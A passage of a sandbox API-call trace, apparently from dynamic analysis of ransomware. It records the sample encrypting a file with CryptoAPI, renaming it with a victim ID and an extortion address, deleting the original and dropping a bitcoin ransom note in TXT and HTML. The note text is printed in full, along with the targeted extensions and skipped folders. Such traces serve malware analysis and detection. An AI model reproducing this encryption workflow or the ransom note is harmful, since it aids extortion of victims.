cr.odm.odo.odt.ofl.oft.openbsd.ort.ott.p7s.pages.pfs.pfx.pjt.plantuml.prt.psw.pu.pvj.pvm.pwi.pwr.qdl.rad.readme.rft.ris.rng.rpt.rst.rt.rtd.rtf.rtx.run.rzk.rzn.saf.safetext.sam.scc.scm.scriv.scrivx.scw.sdm.sdoc.sdw.sgm.sig.skcard.sla.slagz.sls.smf.sms.ssa.strings.stw.sty.sub.sxg.sxw.tab.tdf.text.thp.tlb.tm.tmd.tmv.tmx.tpc.trelby.tvj.txt.u3d.u3i.unauth.unx.uof.uot.upd.utf8.unity.utxt.vct.vnt.vw.wbk.wcf.webdoc.wgz.wn.wp.wp4.wp5.wp6.wp7.wpa.wpl.wps.wpt.wpw.wri.wsc.wsd.wsh.wtx.xbdoc.xbplate.xdl.xlf.xps.xwp.xy3.xyp.xyw.ybk.yml.zabw.zw.2bp.0.36.3fr.411.73i.8xi.9png.abm.afx.agif.agp.aic.albm.apd.apm.aps.apx.artwork.arw.asw.avatar.bay.blkrt.bm2.bmp.bmx.bmz.brk.brn.brt.bss.bti.c4.cal.cals.can.cd5.cdc.cdg.cimg.cin.cit.colz.cpc.cpd.cpg.cps.cpx.cr2.ct.dc2.dcr.dds.dgt.dib.djv.dm3.dmi.vue.dpx.wire.drz.dt2.dtw.dvl.ecw.eip.erf.exr.fal.fax.fil.fpos.g3.gcdp.gfb.gfie.ggr.gif.gih.gim.gmbck.gmspr.spr.scad.gpd.gro.grob.hdr.hpi.i3d.icn.icpr.iiq.info.int.ipx.itc2.iwi.j.j2c.j2k.jas.jb2.jbig.jbig2.jbmp.jbr.jfif.jia.jng.jpg2.jps.jpx.jtf.jwl.jxr.kdc.kdi.kdk.kic.kpg.lbm.ljp.mac.mbm.mef.mnr.mos.mpf.mpo.mrxs.myl.ncr.nct.nlm.nrw.oc3.oc4.oc5.oci.omf.oplc.af2.af3.ai.art.asy.cdmm.cdmt.cdmtz.cdmz.cdt.cgm.cmx.cnv.csy.cv5.cvg.cvi.cvs.cvx.cwt.cxf.dcs.ded.design.dhs.dpp.drw.dxb.dxf.egc.ep.eps.epsf.fh10.fh11.fh3.fh4.fh5.fh6.fh7.fh8.fif.fig.fmv.ft10.ft11.ft7.ft8.ft9.ftn.fxg.gdraw.gem.glox.gsd.hpg.hpgl.hpl.idea.igt.igx.imd.ink.lmk.mgcb.mgmf.mgmt.mt9.mgmx.mgtx.mmat.mat.otg.ovp.ovr.pcs.pfd.pfv.pl.plt.vrml.pobj.psid.rdl.scv.sk1.sk2.slddrt.snagitstamps.snagstyles.ssk.stn.svf.svgz.sxd.tlc.tne.ufr.vbr.vec.vml.vsd.vsdm.vsdx.vstm.stm.vstx.wpg.vsm.vault.xar.xmind.xmmap.yal.orf.ota.oti.ozb.ozj.ozt.pal.pano.pap.pbm.pc1.pc2.pc3.pcd.pdd.pe4.pef.pfi.pgf.pgm.pi1.pi2.pi3.pic.pict.pix.pjpeg.pjpg.pm.pmg.pni.pnm.pntg.pop.pp4.pp5.ppm.prw.psdx.pse.psp.pspbrush.ptg.ptx.pvr.px.pxr.pz3.pza.pzp.pzs.z3d.qmg.ras.rcu.rgb.rgf.ric.riff.rix.rle.rli.rpf.rri.rs.rsb.rsr.rw2.rwl.s2mv.sai.sci.sct.sep.sfc.sfera.sfw.skm.sld.sob.spa.spe.sph.spj.spp.sr2.srw.ste.sumo.sva.save.ssfn.t2b.tb0.tbn.tex.tfc.tg4.thm.thumb.tjp.tm2.tn.tpi.ufo.uga.usertile-ms.vda.vff.vpe.vst.wb1.wbc.wbd.wbm.wbmp.wbz.wdp.webp.wpb.wpe.wvl.x3f.y.ysp.zif.cdr4.cdr6.cdrw.jpeg.djvu.pdf.ddoc.css.pptm.raw.cpt.jpg.jpe.jp2.pcx.pdn.png.psd.tga.tiff.tif.hdp.xpm.ai.ps.wmf.emf.ani.apng.flc.fb2.fb3.fli.mng.smil.svg.mobi.swf.html.xls.xlsx.xlsm.xhtm.mrwref.xf.pst.bd.tar.gz.mkv.xml.xmlx.dat.mcl.mte.cfg.mp3.qbi.qbr.cnt.v30.qbo.lgb.qwc.qbp.aif.qby.1pa.qpd.set.nd.rtp.qbwin.log.qbbackup.tmp.temp1234.qbt.qbsdk.syncmanagerlogger.ecml.qsm.qss.qst.fx0.fx1.mx0.fpx.fxr.fim", lpSrch=".xml") returned=".xml.xmlx.dat.mcl.mte.cfg.mp3.qbi.qbr.cnt.v30.qbo.lgb.qwc.qbp.aif.qby.1pa.qpd.set.nd.rtp.qbwin.log.qbbackup.tmp.temp1234.qbt.qbsdk.syncmanagerlogger.ecml.qsm.qss.qst.fx0.fx1.mx0.fpx.fxr.fim"
	[0173.474] LoadLibraryExA (lpLibFileName="user32.dll", hFile=0x0, dwFlags=0x0) returned 0x76950000
	[0173.474] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfW") returned 0x7697f890
	[0173.474] CreateFileW (lpFileName="c:\\users\\all users\\microsoft\\provisioning\\{99b095d8-5959-4820-bea7-7448c8427b4e}\\masterdatastore.xml" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{99b095d8-5959-4820-bea7-7448c8427b4e}\\masterdatastore.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x390
	[0173.476] ReadFile (in: hFile=0x390, lpBuffer=0xfdcd58, nNumberOfBytesToRead=0x10f, lpNumberOfBytesRead=0x18a640, lpOverlapped=0x0 | out: lpBuffer=0xfdcd58*, lpNumberOfBytesRead=0x18a640*=0x10f, lpOverlapped=0x0) returned 1
	[0173.479] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0173.479] CryptAcquireContextW (in: phProv=0x18a1f0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x18a1f0*=0xfcaef0) returned 1
	[0173.483] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0173.483] CryptCreateHash (in: hProv=0xfcaef0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x18a1f4 | out: phHash=0x18a1f4) returned 1
	[0173.483] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0173.483] CryptHashData (hHash=0xfb9670, pbData=0xfc0b90, dwDataLen=0x10c, dwFlags=0x0) returned 1
	[0173.483] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0173.483] CryptDeriveKey (in: hProv=0xfcaef0, Algid=0x6610, hBaseData=0xfb9670, dwFlags=0x1, phKey=0x18a1f8 | out: phKey=0x18a1f8*=0xfb95f0) returned 1
	[0173.483] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0173.484] CryptEncrypt (in: hKey=0xfb95f0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x18a20c*=0x10f, dwBufLen=0x10f | out: pbData=0x0*, pdwDataLen=0x18a20c*=0x110) returned 1
	[0173.484] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0173.484] RtlMoveMemory (in: Destination=0xfdc6a8, Source=0xfdcd58, Length=0x10f | out: Destination=0xfdc6a8) 
	[0173.484] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0173.484] CryptEncrypt (in: hKey=0xfb95f0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0xfdc6a8*, pdwDataLen=0x18a1ec*=0x10f, dwBufLen=0x110 | out: pbData=0xfdc6a8*, pdwDataLen=0x18a1ec*=0x110) returned 1
	[0173.485] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0173.485] CryptDestroyKey (hKey=0xfb95f0) returned 1
	[0173.485] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0173.485] CryptDestroyHash (hHash=0xfb9670) returned 1
	[0173.485] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0173.485] CryptReleaseContext (hProv=0xfcaef0, dwFlags=0x0) returned 1
	[0173.485] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0173.486] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x18a208, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x18a208*=0xc287f38, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1
	[0173.486] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0173.486] GetUserNameA (in: lpBuffer=0x18a0ec, pcbBuffer=0x18a204 | out: lpBuffer="RDhJ0CNFevzX", pcbBuffer=0x18a204) returned 1
	[0173.487] wsprintfW (in: param_1=0x18a220, param_2="%s.id_%x%x_email_enc2@dr.com_.scl" | out: param_1="c:\\users\\all users\\microsoft\\provisioning\\{99b095d8-5959-4820-bea7-7448c8427b4e}\\masterdatastore.xml.id_c287f3826d6e218_email_enc2@dr.com_.scl") returned 142
	[0173.488] CreateFileW (lpFileName="c:\\users\\all users\\microsoft\\provisioning\\{99b095d8-5959-4820-bea7-7448c8427b4e}\\masterdatastore.xml.id_c287f3826d6e218_email_enc2@dr.com_.scl" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{99b095d8-5959-4820-bea7-7448c8427b4e}\\masterdatastore.xml.id_c287f3826d6e218_email_enc2@dr.com_.scl"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x39c
	[0173.488] WriteFile (in: hFile=0x39c, lpBuffer=0xfdc6a8*, nNumberOfBytesToWrite=0x110, lpNumberOfBytesWritten=0x18a648, lpOverlapped=0x0 | out: lpBuffer=0xfdc6a8*, lpNumberOfBytesWritten=0x18a648*=0x110, lpOverlapped=0x0) returned 1
	[0173.491] CloseHandle (hObject=0x39c) returned 1
	[0173.492] CloseHandle (hObject=0x390) returned 1
	[0173.492] DeleteFileW (lpFileName="c:\\users\\all users\\microsoft\\provisioning\\{99b095d8-5959-4820-bea7-7448c8427b4e}\\masterdatastore.xml" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{99b095d8-5959-4820-bea7-7448c8427b4e}\\masterdatastore.xml")) returned 1
	[0173.495] DeleteFileW (lpFileName="c:\\users\\all users\\microsoft\\provisioning\\{99b095d8-5959-4820-bea7-7448c8427b4e}\\masterdatastore.xml" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{99b095d8-5959-4820-bea7-7448c8427b4e}\\masterdatastore.xml")) returned 0
	[0173.495] FindNextFileW (in: hFindFile=0xfb9bf0, lpFindFileData=0x18ae94 | out: lpFindFileData=0x18ae94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbcdc44d0, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0xbcdea603, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0xbcdea603, ftLastWriteTime.dwHighDateTime=0x1d700aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Prov", cAlternateFileName="")) returned 1
	[0173.496] FindNextFileW (in: hFindFile=0xfb9bf0, lpFindFileData=0x18ae94 | out: lpFindFileData=0x18ae94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbcdc44d0, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0xbcdea603, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0xbcdea603, ftLastWriteTime.dwHighDateTime=0x1d700aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Prov", cAlternateFileName="")) returned 0
	[0173.496] FindClose (in: hFindFile=0xfb9bf0 | out: hFindFile=0xfb9bf0) returned 1
	[0173.496] FindClose (in: hFindFile=0xfb9bf0 | out: hFindFile=0xfb9bf0) returned 0
	[0173.496] lstrcpyW (in: lpString1=0x18aa84, lpString2="C:\\Users\\All Users\\Microsoft\\Provisioning\\{99b095d8-5959-4820-bea7-7448c8427b4e}" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Provisioning\\{99b095d8-5959-4820-bea7-7448c8427b4e}") returned="C:\\Users\\All Users\\Microsoft\\Provisioning\\{99b095d8-5959-4820-bea7-7448c8427b4e}"
	[0173.496] lstrcatW (in: lpString1="C:\\Users\\All Users\\Microsoft\\Provisioning\\{99b095d8-5959-4820-bea7-7448c8427b4e}", lpString2="\\*.*" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Provisioning\\{99b095d8-5959-4820-bea7-7448c8427b4e}\\*.*") returned="C:\\Users\\All Users\\Microsoft\\Provisioning\\{99b095d8-5959-4820-bea7-7448c8427b4e}\\*.*"
	[0173.497] LoadLibraryExA (lpLibFileName="user32.dll", hFile=0x0, dwFlags=0x0) returned 0x76950000
	[0173.497] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfW") returned 0x7697f890
	[0173.597] wsprintfW (in: param_1=0x18a370, param_2="%s\\HELP_DECRYPT_YOUR_FILES.TXT" | out: param_1="C:\\Users\\All Users\\Microsoft\\Provisioning\\{99b095d8-5959-4820-bea7-7448c8427b4e}\\HELP_DECRYPT_YOUR_FILES.TXT") returned 108
	[0173.597] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\Provisioning\\{99b095d8-5959-4820-bea7-7448c8427b4e}\\HELP_DECRYPT_YOUR_FILES.TXT" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{99b095d8-5959-4820-bea7-7448c8427b4e}\\help_decrypt_your_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x388
	[0173.599] lstrlenW (lpString="NOT YOUR LANGUAGE? USE https://translate.google.com\r\n\r\nWhat happened to your files ?\r\nAll of your files were protected by a strong encryption with RSA-2048.\r\nMore information about the encryption keys using RSA-2048 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)\r\n\r\nHow did this happen ?\r\n!!! Specially for your PC was generated personal RSA-2048 KEY, both public and private.\r\n!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet.\r\n!!! Decrypting of your files is only possible with the help of the private key and decrypt program , which is on our Secret Server \r\n\r\nWhat do I do ?\r\nSo, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way.\r\nIf You have really valuable data, you better not waste your time, because there is no other way to get your files, except make a payment.\r\n\r\nFor more specific instructions:\r\nContact us by email only, send us an email along with your ID number and wait for further instructions. Our specialist will contact you within 12 hours. \r\nFor you to be sure, that we can decrypt your files - you can send us a single encrypted file and we will send you back it in a decrypted form. This will be your guarantee. \r\n\r\nPlease do not waste your time! You have 72 hours only! After that The Main Server will double your price!\r\nSo right now You have a chance to buy your individual private HardWare with a low price!\r\n\r\nE-MAIL1: enc2@usa.com\r\nE-MAIL2: enc2@dr.com\r\n\r\n") returned 1571
	[0173.599] WriteFile (in: hFile=0x388, lpBuffer=0x189728*, nNumberOfBytesToWrite=0xc46, lpNumberOfBytesWritten=0x18a64c, lpOverlapped=0x0 | out: lpBuffer=0x189728*, lpNumberOfBytesWritten=0x18a64c*=0xc46, lpOverlapped=0x0) returned 1
	[0173.604] CloseHandle (hObject=0x388) returned 1
	[0173.604] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x1896f8, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x1896f8*=0xc287f38, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1
	[0173.605] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0173.605] GetUserNameA (in: lpBuffer=0x1895dc, pcbBuffer=0x1896f4 | out: lpBuffer="RDhJ0CNFevzX", pcbBuffer=0x1896f4) returned 1
	[0173.607] wsprintfW (in: param_1=0x18a578, param_2="YOUR_ID: %x%x" | out: param_1="YOUR_ID: c287f3826d6e218") returned 24
	[0173.607] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\Provisioning\\{99b095d8-5959-4820-bea7-7448c8427b4e}\\HELP_DECRYPT_YOUR_FILES.TXT" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{99b095d8-5959-4820-bea7-7448c8427b4e}\\help_decrypt_your_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x388
	[0173.607] SetFilePointer (in: hFile=0x388, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0xc46
	[0173.608] lstrlenW (lpString="YOUR_ID: c287f3826d6e218") returned 24
	[0173.608] WriteFile (in: hFile=0x388, lpBuffer=0x18a578*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x18a654, lpOverlapped=0x0 | out: lpBuffer=0x18a578*, lpNumberOfBytesWritten=0x18a654*=0x30, lpOverlapped=0x0) returned 1
	[0173.608] CloseHandle (hObject=0x388) returned 1
	[0173.609] LoadLibraryExA (lpLibFileName="user32.dll", hFile=0x0, dwFlags=0x0) returned 0x76950000
	[0173.609] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfW") returned 0x7697f890
	[0173.609] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfA") returned 0x769804a0
	[0173.609] wsprintfW (in: param_1=0x18a330, param_2="%s\\HELP_DECRYPT_YOUR_FILES.HTML" | out: param_1="C:\\Users\\All Users\\Microsoft\\Provisioning\\{99b095d8-5959-4820-bea7-7448c8427b4e}\\HELP_DECRYPT_YOUR_FILES.HTML") returned 109
	[0173.609] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\Provisioning\\{99b095d8-5959-4820-bea7-7448c8427b4e}\\HELP_DECRYPT_YOUR_FILES.HTML" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{99b095d8-5959-4820-bea7-7448c8427b4e}\\help_decrypt_your_files.html"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x388
	[0173.610] lstrlenA (lpString="<!DOCTYPE html>\n\r<html>\n\r<head>\n\r<meta charset=\"utf-8\">\n\r<title>HELP_DECRYPT_YOUR_FILES</title>\n\r<style>\n\r.text {\n\r text-align:  center;\n\r}\n\r</style>\n\r</head>\n\r<body>\n\r<div class=\"text\">\n\r<strong>NOT YOUR LANGUAGE?</strong> USE <a href=\"https://translate.google.com\">https://translate.google.com</a><br><br>\n\r<strong>What happened to your files ?</strong><br>\n\rAll of your files were protected by a strong encryption with RSA-2048.<br>\n\rMore information about the encryption keys using RSA-2048 can be found here: <a href=\"http://en.wikipedia.org/wiki/RSA_(cryptosystem)\">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br><br>\n\r<strong>How did this happen ?</strong><br>\n\r!!! Specially for your PC was generated personal RSA-2048 KEY, both public and private.<br>\n\r!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet.<br>\n\r!!! Decrypting of your files is only possible with the help of the private key and decrypt program , which is on our Secret Server <br><br>\n\r<strong>What do I do ?</strong><br>\n\rSo, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way.<br>\n\rIf You have really valuable data, you better not waste your time, because there is no other way to get your files, except make a payment.<br><br>\n\r<strong>For more specific instructions:</strong><br>\n\rContact us by email only, send us an email along with your ID number and wait for further instructions. Our specialist will contact you within 12 hours. <br>\n\rFor you to be sure, that we can decrypt your files - you can send us a single encrypted file and we will send you back it in a decrypted form. This will be your guarantee. <br>\n\r\n\rPlease do not waste your time! You have 72 hours only! After that The Main Server will double your price!\r\nSo right now You have a chance to buy your individual private HardWare with a low price! <br>\r\n<strong>E-MAIL1:</strong>\x09enc2@usa.com<br>\n\r<strong>E-MAIL2:</strong>\x09enc2@dr.com<br>\n\r") returned 2056
	[0173.610] WriteFile (in: hFile=0x388, lpBuffer=0x189b24*, nNumberOfBytesToWrite=0x808, lpNumberOfBytesWritten=0x18a648, lpOverlapped=0x0 | out: lpBuffer=0x189b24*, lpNumberOfBytesWritten=0x18a648*=0x808, lpOverlapped=0x0) returned 1
	[0173.613] CloseHandle (hObject=0x388) returned 1
	[0173.613] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0173.614] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x189b0c, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x189b0c*=0xc287f38, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1
	[0173.614] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0173.614] GetUserNameA (in: lpBuffer=0x1899f0, pcbBuffer=0x189b08 | out: lpBuffer="RDhJ0CNFevzX", pcbBuffer=0x189b08) returned 1
	[0173.616] wsprintfA (in: param_1=0x18a538, param_2="<strong>YOUR_ID: %x%x</strong>\r\n</div>\r\n</body>\x09\n</html>" | out: param_1="<strong>YOUR_ID: c287f3826d6e218</strong>\r\n</div>\r\n</body>\x09\n</html>") returned 67
	[0173.616] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\Provisioning\\{99b095d8-5959-4820-bea7-7448c8427b4e}\\HELP_DECRYPT_YOUR_FILES.HTML" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{99b095d8-5959-4820-bea7-7448c8427b4e}\\help_decrypt_your_files.html"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x388
	[0173.617] SetFilePointer (in: hFile=0x388, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x808
	[0173.617] lstrlenA (lpString="<strong>YOUR_ID: c287f3826d6e218</strong>\r\n</div>\r\n</body>\x09\n</html>") returned 67
	[0173.617] WriteFile (in: hFile=0x388, lpBuffer=0x18a538*, nNumberOfBytesToWrite=0x43, lpNumberOfBytesWritten=0x18a650, lpOverlapped=0x0 | out: lpBuffer=0x18a538*, lpNumberOfBytesWritten=0x18a650*=0x43, lpOverlapped=0x0) returned 1
	[0173.617] CloseHandle (hObject=0x388) returned 1
	[0173.619] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\Provisioning\\{99b095d8-5959-4820-bea7-7448c8427b4e}\\*.*" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{99b095d8-5959-4820-bea7-7448c8427b4e}\\*.*"), lpFindFileData=0x18ae94 | out: lpFindFileData=0x18ae94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbcdc44d0, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0x80f00294, ftLastAccessTime.dwHighDateTime=0x1d97afb, ftLastWriteTime.dwLowDateTime=0x8103170f, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xfb9b30
	[0173.619] lstrlenW (lpString="C:\\Users\\All Users\\Microsoft\\Provisioning\\{99b095d8-5959-4820-bea7-7448c8427b4e}\\*.*") returned 84
	[0173.619] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76950000
	[0173.620] CharLowerBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\Provisioning\\{99b095d8-5959-4820-bea7-7448c8427b4e}\\*.*", cchLength=0x54 | out: lpsz="c:\\users\\all users\\microsoft\\provisioning\\{99b095d8-5959-4820-bea7-7448c8427b4e}\\*.*") returned 0x54
	[0173.620] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0173.620] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{99b095d8-5959-4820-bea7-7448c8427b4e}\\*.*", lpSrch="windows") returned 0x0
	[0173.620] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0173.620] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{99b095d8-5959-4820-bea7-7448c8427b4e}\\*.*", lpSrch="boot") returned 0x0
	[0173.620] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0173.620] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{99b095d8-5959-4820-bea7-7448c8427b4e}\\*.*", lpSrch="system volume information") returned 0x0
	[0173.620] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0173.621] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{99b095d8-5959-4820-bea7-7448c8427b4e}\\*.*", lpSrch="$recycle.bin") returned 0x0
	[0173.621] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0173.621] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{99b095d8-5959-4820-bea7-7448c8427b4e}\\*.*", lpSrch="temp") returned 0x0
	[0173.621] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0173.621] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{99b095d8-5959-4820-bea7-7448c8427b4e}\\*.*", lpSrch="program files") returned 0x0
	[0173.621] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0173.621] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{99b095d8-5959-4820-bea7-7448c8427b4e}\\*.*", lpSrch="program files (x86)") returned 0x0
	[0173.622] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0173.622] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{99b095d8-5959-4820-bea7-7448c8427b4e}\\*.*", lpSrch="appdata") returned 0x0
	[0173.622] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0173.630] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{99b095d8-5959-4820-bea7-7448c8427b4e}\\*.*", lpSrch="application data") returned 0x0
	[0173.630] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0173.630] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{99b095d8-5959-4820-bea7-7448c8427b4e}\\*.*", lpSrch="winnt") returned 0x0
	[0173.630] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0173.631] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{99b095d8-5959-4820-bea7-7448c8427b4e}\\*.*", lpSrch="tmp") returned 0x0
	[0173.631] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0173.631] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{99b095d8-5959-4820-bea7-7448c8427b4e}\\*.*", lpSrch="cache") returned 0x0
	[0173.631] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0173.631] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{99b095d8-5959-4820-bea7-7448c8427b4e}\\*.*", lpSrch="temporary internet files") returned 0x0
	[0173.631] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0173.631] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{99b095d8-5959-4820-bea7-7448c8427b4e}\\*.*", lpSrch="webcache") returned 0x0
	[0173.631] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0173.632] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{99b095d8-5959-4820-bea7-7448c8427b4e}\\*.*", lpSrch="inetcache") returned 0x0
	[0173.632] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0173.632] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{99b095d8-5959-4820-bea7-7448c8427b4e}\\*.*", lpSrch="nvidia") returned 0x0
	[0173.632] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0173.632] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{99b095d8-5959-4820-bea7-7448c8427b4e}\\*.*", lpSrch="packages") returned 0x0
	[0173.632] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0173.632] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{99b095d8-5959-4820-bea7-7448c8427b4e}\\*.*", lpSrch="cookies") returned 0x0
	[0173.633] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
